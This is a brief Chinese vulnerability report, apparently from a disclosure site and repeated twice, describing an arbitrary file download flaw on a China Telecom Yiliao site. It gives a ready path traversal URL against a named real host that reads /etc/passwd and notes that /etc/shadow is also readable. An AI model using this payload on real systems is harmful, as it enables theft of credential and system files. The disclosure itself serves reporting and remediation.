中国电信翼聊网站任意下载漏洞
详细说明:
wap.ecplive.cn/ecpclientdown/download.do?file=../../../../../../../../../etc/passwd
file这个参数
另外shadow也可以的
所以webserver应该是root启的
漏洞证明:
上一篇:土豆用户注册存在XSS跨站
下一篇:百度游戏合作伙伴跨站
详细说明:
wap.ecplive.cn/ecpclientdown/download.do?file=../../../../../../../../../etc/passwd
file这个参数
另外shadow也可以的
所以webserver应该是root启的
漏洞证明:
上一篇:土豆用户注册存在XSS跨站
下一篇:百度游戏合作伙伴跨站